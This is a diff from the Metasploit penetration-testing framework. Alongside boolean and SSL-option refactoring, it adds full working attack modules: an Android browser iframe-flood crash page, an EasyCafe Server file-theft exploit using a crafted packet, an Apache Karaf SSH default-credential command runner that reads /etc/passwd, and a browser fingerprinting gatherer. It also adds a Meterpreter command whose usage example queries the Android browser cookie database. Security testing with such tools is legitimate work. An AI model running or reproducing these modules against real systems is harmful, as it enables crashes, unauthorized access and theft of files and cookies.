TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201)
end

57
lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
View File

@ -31,6 +31,7 @@ class Console::CommandDispatcher::Android
'wlan_geolocate' => 'Get current lat-long using WLAN information',
'interval_collect' => 'Manage interval collection capabilities',
'activity_start' => 'Start an Android activity from a Uri string',
'sqlite_query' => 'Query a SQLite database from storage',
'set_audio_mode' => 'Set Ringer Mode'
}
@ -45,6 +46,7 @@ class Console::CommandDispatcher::Android
'wlan_geolocate' => ['wlan_geolocate'],
'interval_collect' => ['interval_collect'],
'activity_start' => ['activity_start'],
'sqlite_query' => ['sqlite_query'],
'set_audio_mode' => ['set_audio_mode']
}
@ -189,7 +191,7 @@ class Console::CommandDispatcher::Android
path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
dump_sms_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-o' => [ false, 'Output path for sms list']
'-o' => [ true, 'Output path for sms list']
)
dump_sms_opts.parse(args) do |opt, _idx, val|
@ -277,7 +279,7 @@ class Console::CommandDispatcher::Android
dump_contacts_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-o' => [ false, 'Output path for contacts list']
'-o' => [ true, 'Output path for contacts list']
)
dump_contacts_opts.parse(args) do |opt, _idx, val|
@ -381,7 +383,7 @@ class Console::CommandDispatcher::Android
dump_calllog_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-o' => [ false, 'Output path for call log']
'-o' => [ true, 'Output path for call log']
)
@ -578,6 +580,55 @@ class Console::CommandDispatcher::Android
end
end
def cmd_sqlite_query(*args)
sqlite_query_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-d' => [ true, 'The sqlite database file'],
'-q' => [ true, 'The sqlite statement to execute'],
'-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)']
)
writeable = false
database = ''
query = ''
sqlite_query_opts.parse(args) do |opt, _idx, val|
case opt
when '-h'
print_line("Usage: sqlite_query -d <database_file> -q <statement>\n")
print_line(sqlite_query_opts.usage)
return
when '-d'
database = val
when '-q'
query = val
when '-w'
writeable = true
end
end
if database.blank? || query.blank?
print_error("You must enter both a database files and a query")
print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'")
print_line(sqlite_query_opts.usage)
return
end
result = client.android.sqlite_query(database, query, writeable)
unless writeable
header = "#{query} on database file #{database}"
table = Rex::Ui::Text::Table.new(
'Header' => header,
'Columns' => result[:columns],
'Indent' => 0
)
result[:rows].each do |e|
table << e
end
print_line
print_line(table.to_s)
end
end
#
# Name for this dispatcher
#

7
lib/rex/socket/ssl_tcp.rb
View File

@ -65,7 +65,7 @@ begin
when 'SSL2', :SSLv2
version = :SSLv2
# 'TLS' will be the new name for autonegotation with newer versions of OpenSSL
when 'SSL23', :SSLv23, 'TLS'
when 'SSL23', :SSLv23, 'TLS', 'Auto'
version = :SSLv23
when 'SSL3', :SSLv3
version = :SSLv3
@ -124,6 +124,11 @@ begin
# Tie the context to a socket
self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx)
# If peerhost looks like a hostname, set the undocumented 'hostname'
# attribute on sslsock, which enables the Server Name Indication (SNI)
# extension
self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost)
# Force a negotiation timeout
begin
Timeout.timeout(params.timeout) do

2
metasploit-framework.gemspec
View File

@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '1.1.0'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.1.2'
spec.add_runtime_dependency 'metasploit-payloads', '1.1.3'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.

2
modules/auxiliary/admin/mssql/mssql_enum.rb
View File

@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
def run
print_status("Running MS SQL Server Enumeration...")
if mssql_login_datastore == false
if !mssql_login_datastore
print_error("Login was unsuccessful. Check your credentials.")
disconnect
return

2
modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
View File

@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']),
OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']),
OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]),
], self.class)
end

4
modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]),
], self.class)
end
@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
vscpath = datastore['VSCPATH']
else
unless datastore['CREATE_NEW_VSC'] == true
unless datastore['CREATE_NEW_VSC']
vscpath = check_vss(text, bat)
end
unless vscpath

62
modules/auxiliary/dos/android/android_stock_browser_iframe.rb Normal file
View File

@ -0,0 +1,62 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "Android Stock Browser Iframe DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
If successful, the browser will crash after viewing the webpage.
),
'License' => MSF_LICENSE,
'Author' => [
'Jean Pascal Pereira', # Original exploit discovery
'Jonathan Waggoner' # Metasploit module
],
'References' => [
[ 'PACKETSTORM', '118539'],
[ 'CVE', '2012-6301' ]
],
'DisclosureDate' => "Dec 1 2012",
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html>
<body>
<script type="text/javascript">
for (var i = 0; i < 600; i++)
{
var m_frame = document.createElement("iframe");
m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");
document.body.appendChild(m_frame);
}
</script>
</body>
</html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end

3
modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb
View File

@ -7,6 +7,9 @@ require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
include Msf::Module::Deprecated
deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe')
def initialize(info = {})
super(

1
modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb
View File

@ -37,7 +37,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1',
'RPORT' => 443
}
))

3
modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb
View File

@ -28,6 +28,9 @@ class MetasploitModule < Msf::Auxiliary
[ 'MSB', 'MS09-065' ],
[ 'OSVDB', '59869']
],
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer',
'DisclosureDate' => 'Nov 10 2009'
))
register_options([

2
modules/auxiliary/fuzzers/http/http_form_field.rb
View File

@ -538,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
end
# fuzz headers ?
if datastore['FUZZHEADERS'] == true
if datastore['FUZZHEADERS']
print_status("Fuzzing header fields")
do_fuzz_headers(thisform,response.headers)
end

5
modules/auxiliary/gather/apache_karaf_command_execution.rb
View File

@ -9,6 +9,9 @@ require 'net/ssh'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Module::Deprecated
deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution')
def initialize(info={})
super(update_info(info,
@ -130,4 +133,4 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
end
end

2
modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
View File

@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
# set.
#
def use_zlib
unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false
unless Rex::Text.zlib_present? || !datastore['HTTP::compression']
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end

85
modules/auxiliary/gather/browser_info.rb Normal file
View File

@ -0,0 +1,85 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "HTTP Client Information Gather",
'Description' => %q{
This module gathers information about a browser that exploits might be interested in, such
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
but you can customize this output by changing the Custom404 datastore option, and
redirect to an external web page.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'DisclosureDate' => "Mar 22 2016",
'Actions' =>
[
[
'WebServer', {
'Description' => 'A web that collects information about the browser.'
}]
],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
))
end
def is_key_wanted?(key)
![:module, :created_at, :tried, :vuln_test, :address].include?(key)
end
def is_value_wanted?(value)
!(value.nil? || value =~ /^undefined|false/ || !value)
end
def ignore_items!(target_info)
target_info.delete_if do |key, value|
!is_key_wanted?(key) || !is_value_wanted?(value)
end
end
def report_host_info(target_info)
opts = { host: target_info[:address] }
opts.merge!(target_info)
report_host(opts)
end
def translate_script_meaning(value)
case value
when 'script'
'Browser allows JavaScript'
when 'headers'
'Browser does not allow JavaScript'
end
end
def print_target_info(cli, target_info)
print_status("#{cli.peerhost} - We have found the following interesting information:")
report_host_info(target_info)
ignore_items!(target_info)
target_info.each_pair do |key, value|
if key == :source
value = translate_script_meaning(value)
end
print_status("#{cli.peerhost} - #{key} = #{value}")
end
end
def on_request_exploit(cli, req, target_info)
print_target_info(cli, target_info)
send_not_found(cli)
end
def run
exploit
end
end

1
modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb
View File

@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'SSLVersion' => 'TLS1',
'SSL' => true
}
))

2
modules/auxiliary/gather/safari_file_url_navigation.rb
View File

@ -286,7 +286,7 @@ class MetasploitModule < Msf::Auxiliary
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end

9
modules/auxiliary/gather/ssllabs_scan.rb
View File

@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
name = name.to_s.camelize(:lower)
uri = api_path + name
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1')
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS')
cli.connect
req = cli.request_cgi({
'uri' => uri,
@ -430,16 +430,15 @@ class MetasploitModule < Msf::Auxiliary
{
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
register_options(
[
OptString.new('HOSTNAME', [true, 'The target hostname']),
OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]),
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']),
OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']),
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true'])
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]),
OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]),
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true])
], self.class)
end

1
modules/auxiliary/scanner/http/chef_webui_login.rb
View File

@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1'
}
)

1
modules/auxiliary/scanner/http/f5_mgmt_scanner.rb
View File

@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1',
'RPORT' => 443
}
))

3
modules/auxiliary/scanner/http/ssl_version.rb
View File

@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
{
'SSL' => true,
'RPORT' => 443,
'SSLVersion' => 'SSL3'
},
'References' =>
[
@ -43,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']])
Opt::SSLVersion
]
)

1
modules/auxiliary/scanner/http/symantec_web_gateway_login.rb
View File

@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
{
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
end

21
modules/auxiliary/scanner/http/title.rb
View File

@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]),
OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]),
OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
@ -35,8 +34,8 @@ class MetasploitModule < Msf::Auxiliary
end
def run
if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false
print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.")
if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES']
print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.")
else
super
end
@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
# If no response, quit now
if res.nil?
print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No response")
return
end
@ -65,12 +64,12 @@ class MetasploitModule < Msf::Auxiliary
server_header = val if key.downcase == 'server'
end
else
print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No HTTP headers")
end
# If the body is blank, just stop now as there is no chance of a title
if res.body.nil?
print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No webpage body")
return
end
@ -78,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
# there is no chance that we will have a title
rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
unless rx
print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No webpage title")
return
end
@ -86,13 +85,15 @@ class MetasploitModule < Msf::Auxiliary
rx[:title].strip!
if rx[:title] != ''
rx_title = Rex::Text.html_decode(rx[:title])
print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true
if datastore['STORE_NOTES'] == true
if datastore['SHOW_TITLES']
print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}")
end
if datastore['STORE_NOTES']
notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] }
report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data)
end
else
print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No webpage title")
end
end

4
modules/auxiliary/scanner/http/tplink_traversal_noauth.rb
View File

@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file)
vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
if datastore['VERBOSE'] == true
if datastore['VERBOSE']
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
res.body.each_line do |line|
# the following is the last line of the useless response
@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
end
out = false
end
elsif (res and res.code)
elsif res && res.code
vprint_error("#{rhost}:#{rport} - File->#{file} not found")
end
end

97
modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb Normal file
View File

@ -0,0 +1,97 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'EasyCafe Server Remote File Access',
'Description' => %q{
This module exploits a file retrieval vulnerability in
EasyCafe Server. The vulnerability can be triggered by
sending a specially crafted packet (opcode 0x43) to the
831/TCP port.
This module has been successfully tested on EasyCafe Server
version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
and Windows 7 SP1.
Note that the server will throw a popup messagebox if the
specified file does not exist.
},
'License' => MSF_LICENSE,
'Author' =>
[
'R-73eN', # Vulnerability Discovery
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '39102' ]
]
))
register_options(
[
Opt::RPORT(831),
OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
], self.class)
end
def get_file
res = sock.get_once
unless res
print_error("Unable to retrieve file due to a timeout.")
return
end
unless res.length == 261
print_error("Received a response of an invalid size.")
return
end
file_size = res.unpack('@256V')[0]
contents = ''
while contents.length < file_size
contents << sock.get_once
end
print_status("File retrieved successfully (#{contents.length} bytes)!")
contents
end
def run_host(ip)
file_path = datastore['FILEPATH']
if file_path.length > 67
print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
return
end
packet = "\x43"
packet << file_path
packet << "\x00" * (255 - file_path.length)
packet << "\x01\x00\x00\x00\x01"
vprint_status("Sending request (#{packet.length} bytes)")
connect
sock.put(packet)
contents = get_file
disconnect
return if contents.nil?
path = store_loot(
'easycafe_server',
'application/octet-stream',
ip,
contents,
File.basename(file_path)
)
print_status("File saved in: #{path}")
end
end

2
modules/auxiliary/scanner/mssql/mssql_hashdump.rb
View File

@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
if (not mssql_login_datastore)
if !mssql_login_datastore
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
return
end

2
modules/auxiliary/scanner/mssql/mssql_schemadump.rb
View File

@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
if (not mssql_login_datastore)
if !mssql_login_datastore
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
return
end

1
modules/auxiliary/scanner/nessus/nessus_rest_login.rb
View File

@ -25,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
register_options(

4
modules/auxiliary/scanner/ntp/ntp_monlist.rb
View File

@ -37,12 +37,12 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]),
OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false'])
OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false])
], self.class)
register_advanced_options(
[
OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false'])
OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false])
], self.class)
end

2
modules/auxiliary/scanner/rdp/ms12_020_check.rb
View File

@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])
OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ])
], self.class)
end

2
modules/auxiliary/scanner/smb/smb_enumshares.rb
View File

@ -408,7 +408,7 @@ class MetasploitModule < Msf::Auxiliary
end
subdirs.shift
end
print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true
print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles']
end
unless detailed_tbl.rows.empty?
if datastore['LogSpider'] == '1'

133
modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb Normal file
View File

@ -0,0 +1,133 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "Apache Karaf Default Credentials Command Execution",
'Description' => %q{
This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.
The 'karaf' user has a known default password, which can be used to login to the
SSH service, and execute operating system commands from remote.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicholas Starke <nick@alephvoid.com>'
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
['Apache Karaf', {}],
],
'Privileged' => true,
'DisclosureDate' => "Feb 9 2016",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8101),
OptString.new('USERNAME', [true, 'Username', 'karaf']),
OptString.new('PASSWORD', [true, 'Password', 'karaf']),
OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd'])
], self.class
)
register_advanced_options(
[
Opt::Proxies,
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def cmd
datastore['CMD']
end
def do_login(user, pass, ip)
opts = {
:auth_methods => ['password'],
:msframework => framework,
:msfmodule => self,
:port => rport,
:disable_agent => true,
:config => false,
:password => pass,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(ip, user, opts)
end
rescue OpenSSL::Cipher::CipherError => e
print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})")
return
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{ip}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{ip}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{ip}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'")
else
print_error "#{ip}:#{rport} - Unknown error"
end
ssh
end
def run_host(ip)
print_status("#{ip}:#{rport} - Attempt to login...")
ssh = do_login(username, password, ip)
if ssh
output = ssh.exec!("shell:exec #{cmd}\n").to_s
if output
print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}")
store_loot("apache.karaf.command",
"text/plain",
ip,
output)
vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command")
else
print_error "#{ip}:#{rport} - Command failed to execute"
end
end
end
end

4
modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
View File

@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
],
'DisclosureDate' => 'Jan 09 2016',
'DisclosureDate' => 'Jan 9 2016',
'License' => MSF_LICENSE
))
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
ssh_opts = {
port: datastore['RPORT'],
port: rport,
auth_methods: ['fortinet-backdoor']
}

2
modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
View File

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(69),
OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])
], self.class)
end

6
modules/encoders/x86/opt_sub.rb
View File

@ -52,7 +52,7 @@ class MetasploitModule < Msf::Encoder
register_options(
[
OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]),
OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ])
OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false])
],
self.class)
end
@ -179,10 +179,8 @@ class MetasploitModule < Msf::Encoder
raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set."
end
protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true"
# with everything set up, we can now call the encoding routine
state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload)
state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect'])
state.buf = ""
state.decoder_stub

2
modules/exploits/linux/http/symantec_web_gateway_lfi.rb
View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'WfsDelay' => 300, #5 minutes
'DisablePayloadHandler' => 'false',
'DisablePayloadHandler' => false,
'EXITFUNC' => 'thread'
},
'Platform' => ['php'],

1
modules/exploits/linux/http/symantec_web_gateway_restore.rb
View File

@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,

8
modules/exploits/multi/http/cups_bash_env_exec.rb
View File

@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
if res.body =~ /Set Default Options for #{printer_name}/
vprint_good("Added printer successfully")
delete_printer(printer_name)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
vprint_error("Authentication failed")
elsif res.code == 426
vprint_error("SSL required - set SSL true")
@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
elsif res.body =~ /Set Default Options for #{printer_name}/
print_good("Added printer successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
elsif res.body =~ /Test page sent; job ID is/
vprint_good("Added test page to printer queue")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
elsif res.body =~ /has been deleted successfully/
print_status("Deleted printer '#{printer_name}' successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.")
elsif res.code == 426
vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.")

2
modules/exploits/multi/http/joomla_http_header_rce.rb
View File

@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
if check == Exploit::CheckCode::Safe && !datastore['FORCE']
print_error('Target seems safe, so we will not continue.')
return
end

2
modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
View File

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
'Description' => %q{
This module exploits an arbitrary code execution backdoor
placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,

2
